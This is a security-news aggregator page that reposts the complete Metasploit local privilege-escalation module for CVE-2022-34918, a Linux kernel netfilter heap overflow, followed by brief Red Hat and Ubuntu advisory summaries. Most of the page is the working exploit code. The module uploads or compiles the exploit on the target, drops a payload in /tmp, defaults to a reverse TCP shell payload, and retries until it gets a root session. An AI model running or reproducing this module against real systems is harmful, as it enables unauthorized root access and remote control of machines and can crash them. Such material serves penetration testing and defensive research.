Security
Headlines
HeadlinesLatestCVEs

Headline

Netfilter nft_set_elem_init Heap Overflow Privilege Escalation

An issue was discovered in the Linux kernel through version 5.18.9. A type confusion bug in nft_set_elem_init (leading to a buffer overflow) could be used by a local attacker to escalate privileges. The attacker can obtain root access, but must start with an unprivileged user namespace to obtain CAP_NET_ADMIN access. The issue exists in nft_setelem_parse_data in net/netfilter/nf_tables_api.c.

Packet Storm
#vulnerability#ubuntu#linux#git#buffer_overflow#auth#mongo
# frozen_string_literal: true### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = GreatRanking  include Msf::Post::Common  include Msf::Post::Linux::Priv  include Msf::Post::Linux::System  include Msf::Post::Linux::Kernel  include Msf::Post::Linux::Compile  include Msf::Post::File  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Netfilter nft_set_elem_init Heap Overflow Privilege Escalation',        'Description' => %q{          An issue was discovered in the Linux kernel through 5.18.9.          A type confusion bug in nft_set_elem_init (leading to a buffer overflow)          could be used by a local attacker to escalate privileges.          The attacker can obtain root access, but must start with an unprivileged          user namespace to obtain CAP_NET_ADMIN access.          The issue exists in nft_setelem_parse_data in net/netfilter/nf_tables_api.c.        },        'License' => MSF_LICENSE,        'Author' => [          'Arthur Mongodin <amongodin[at]randorisec.fr> (@_Aleknight_)', # Vulnerability discovery, original exploit PoC          'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # Metasploit module, exploit PoC updates        ],        'DisclosureDate' => '2022-02-07',        'Platform' => 'linux',        'Arch' => [ARCH_X64],        'SessionTypes' => %w[meterpreter shell],        'DefaultOptions' => {          'Payload' => 'linux/x64/shell_reverse_tcp',          'PrependSetresuid' => true,          'PrependSetresgid' => true,          'PrependFork' => true,          'WfsDelay' => 30        },        'Targets' => [['Auto', {}]],        'DefaultTarget' => 0,        'Notes' => {          'Reliability' => [UNRELIABLE_SESSION], # The module could fail to get root sometimes.          'Stability' => [OS_RESOURCE_LOSS, CRASH_OS_DOWN], # After too many failed attempts, the system needs to be restarted.          'SideEffects' => [ARTIFACTS_ON_DISK]        },        'References' => [          ['CVE', '2022-34918'],          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-34918'],          ['URL', 'https://ubuntu.com/security/CVE-2022-34918'],          ['URL', 'https://www.randorisec.fr/crack-linux-firewall/'],          ['URL', 'https://github.com/randorisec/CVE-2022-34918-LPE-PoC']        ]      )    )    register_options(      [        OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ]),        OptInt.new('MAX_TRIES', [ true, 'Number of times to execute the exploit', 5])      ]    )    register_advanced_options(      [        OptString.new('WritableDir', [true, 'Directory to write persistent payload file.', '/tmp'])      ]    )  end  def base_dir    datastore['WritableDir']  end  def upload_exploit_binary    @executable_path = ::File.join(base_dir, rand_text_alphanumeric(5..10))    upload_and_chmodx(@executable_path, exploit_data('CVE-2022-34918', 'ubuntu.elf'))    register_file_for_cleanup(@executable_path)  end  def upload_payload_binary    @payload_path = ::File.join(base_dir, rand_text_alphanumeric(5..10))    upload_and_chmodx(@payload_path, generate_payload_exe)    register_file_for_cleanup(@payload_path)  end  def upload_source    @exploit_source_path = ::File.join(base_dir, rand_text_alphanumeric(5..10))    mkdir(@exploit_source_path)    register_dir_for_cleanup(@exploit_source_path)    dirs = [ '.' ]    until dirs.empty?      current_dir = dirs.pop      dir_full_path = ::File.join(::Msf::Config.install_root, 'external/source/exploits/CVE-2022-34918', current_dir)      Dir.entries(dir_full_path).each do |ent|        next if ent == '.' || ent == '..'        full_path_host = ::File.join(dir_full_path, ent)        relative_path = ::File.join(current_dir, ent)        full_path_target = ::File.join(@exploit_source_path, current_dir, ent)        if File.file?(full_path_host)          vprint_status("Uploading #{relative_path} to #{full_path_target}")          upload_file(full_path_target, full_path_host)        elsif File.directory?(full_path_host)          vprint_status("Creating the directory #{full_path_target}")          mkdir(full_path_target)          dirs.push(relative_path)        else          print_error("#{full_path_host} doesn't look like a file or a directory")        end      end    end  end  def compile_source    fail_with(Failure::BadConfig, 'make command not available on the target') unless command_exists?('make')    info = cmd_exec("make -C #{@exploit_source_path}")    vprint_status(info)    @executable_path = ::File.join(@exploit_source_path, 'ubuntu.elf')    if exists?(@executable_path)      chmod(@executable_path, 0o700) unless executable?(@executable_path)      print_good('Compilation was successful')    else      fail_with(Failure::UnexpectedReply, 'Compilation has failed (executable not found)')    end  end  def run_payload    success = false    1.upto(datastore['MAX_TRIES']) do |i|      vprint_status "Execution attempt ##{i}"      info = cmd_exec(@executable_path, @payload_path)      info.each_line do |line|        vprint_status(line.chomp)      end      if session_created?        success = true        break      end      sleep 3    end    if success      print_good('A session has been created')    else      print_bad('Exploit has failed')    end  end  def get_external_source_code(cve, file)    file_path = ::File.join(::Msf::Config.install_root, "external/source/exploits/#{cve}/#{file}")    ::File.binread(file_path)  end  def module_check    release = kernel_release    version = "#{release} #{kernel_version.split(' ').first}"    ubuntu_offsets = strip_comments(get_external_source_code('CVE-2022-34918', 'src/util.c')).scan(/kernels\[\] = \{(.+?)\};/m).flatten.first    ubuntu_kernels = ubuntu_offsets.scan(/"(.+?)"/).flatten    if ubuntu_kernels.empty?      fail_with(Msf::Module::Failure::BadConfig, 'Error parsing the list of supported kernels.')    end    fail_with(Failure::NoTarget, "No offsets for '#{version}'") unless ubuntu_kernels.include?(version)    fail_with(Failure::BadConfig, "#{base_dir} is not writable.") unless writable?(base_dir)    fail_with(Failure::BadConfig, '/tmp is not writable.') unless writable?('/tmp')    if is_root?      fail_with(Failure::BadConfig, 'Session already has root privileges.')    end  end  def check    config = kernel_config    return CheckCode::Unknown('Could not retrieve kernel config') if config.nil?    return CheckCode::Safe('Kernel config does not include CONFIG_USER_NS') unless config.include?('CONFIG_USER_NS=y')    return CheckCode::Safe('Unprivileged user namespaces are not permitted') unless userns_enabled?    return CheckCode::Safe('LKRG is installed') if lkrg_installed?    arch = kernel_hardware    return CheckCode::Safe("System architecture #{arch} is not supported") unless arch.include?('x86_64')    release = kernel_release    version, patchlvl = release.match(/^(\d+)\.(\d+)/)&.captures    if version&.to_i == 5 && patchlvl && (7..19).include?(patchlvl.to_i)      return CheckCode::Appears # ("The kernel #{version} appears to be vulnerable, but no offsets are available for this version")    end    CheckCode::Safe  end  def exploit    module_check unless datastore['ForceExploit']    if datastore['COMPILE'] == 'True' || (datastore['COMPILE'] == 'Auto' && command_exists?('make'))      print_status('Uploading the exploit source code')      upload_source      print_status('Compiling the exploit source code')      compile_source    else      print_status('Dropping pre-compiled binaries to system...')      upload_exploit_binary    end    print_status('Uploading payload...')    upload_payload_binary    print_status('Running payload on remote system...')    run_payload  endend

Related news

Fake GitHub Repos Caught Dropping Malware as PoCs AGAIN!

By Habiba Rashid At the time of writing, all reported fake repositories have been taken down and the malicious PoC has been removed from GitHub. This is a post from HackRead.com Read the original post: Fake GitHub Repos Caught Dropping Malware as PoCs AGAIN!

Red Hat Security Advisory 2022-6592-01

Red Hat Security Advisory 2022-6592-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include a heap overflow vulnerability.

Red Hat Security Advisory 2022-6582-01

Red Hat Security Advisory 2022-6582-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include buffer overflow and heap overflow vulnerabilities.

Red Hat Security Advisory 2022-6610-01

Red Hat Security Advisory 2022-6610-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include buffer overflow and heap overflow vulnerabilities.

RHSA-2022:6610: Red Hat Security Advisory: kernel security, bug fix, and enhancement update

An update for kernel is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-2078: kernel: Vulnerability of buffer overflow in nft_set_desc_concat_parse() * CVE-2022-34918: kernel: heap overflow in nft_set_elem_init()

RHSA-2022:6582: Red Hat Security Advisory: kernel-rt security and bug fix update

An update for kernel-rt is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-2078: kernel: Vulnerability of buffer overflow in nft_set_desc_concat_parse() * CVE-2022-34918: kernel: heap overflow in nft_set_elem_init()

RHSA-2022:6592: Red Hat Security Advisory: kpatch-patch security update

An update for kpatch-patch is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-34918: kernel: heap overflow in nft_set_elem_init()

Kernel Live Patch Security Notice LSN-0089-1

Aaron Adams discovered that the netfilter subsystem in the Linux kernel did not properly handle the removal of stateful expressions in some situations, leading to a use-after-free vulnerability. Ziming Zhang discovered that the netfilter subsystem in the Linux kernel did not properly validate sets with multiple ranged fields. It was discovered that the implementation of POSIX timers in the Linux kernel did not properly clean up timers in some situations. Various other vulnerabilities were also discovered.

Ubuntu Security Notice USN-5566-1

Ubuntu Security Notice 5566-1 - Zhenpeng Lin discovered that the network packet scheduler implementation in the Linux kernel did not properly remove all references to a route filter before freeing it in some situations. A local attacker could use this to cause a denial of service or execute arbitrary code. It was discovered that the netfilter subsystem of the Linux kernel did not prevent one nft object from referencing an nft set in another nft table, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or execute arbitrary code.

Ubuntu Security Notice USN-5544-1

Ubuntu Security Notice 5544-1 - It was discovered that the Atheros ath9k wireless device driver in the Linux kernel did not properly handle some error conditions, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Felix Fu discovered that the Sun RPC implementation in the Linux kernel did not properly handle socket states, leading to a use-after-free vulnerability. A remote attacker could possibly use this to cause a denial of service or execute arbitrary code.

CVE-2022-34918

An issue was discovered in the Linux kernel through 5.18.9. A type confusion bug in nft_set_elem_init (leading to a buffer overflow) could be used by a local attacker to escalate privileges, a different vulnerability than CVE-2022-32250. (The attacker can obtain root access, but must start with an unprivileged user namespace to obtain CAP_NET_ADMIN access.) This can be fixed in nft_setelem_parse_data in net/netfilter/nf_tables_api.c.

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution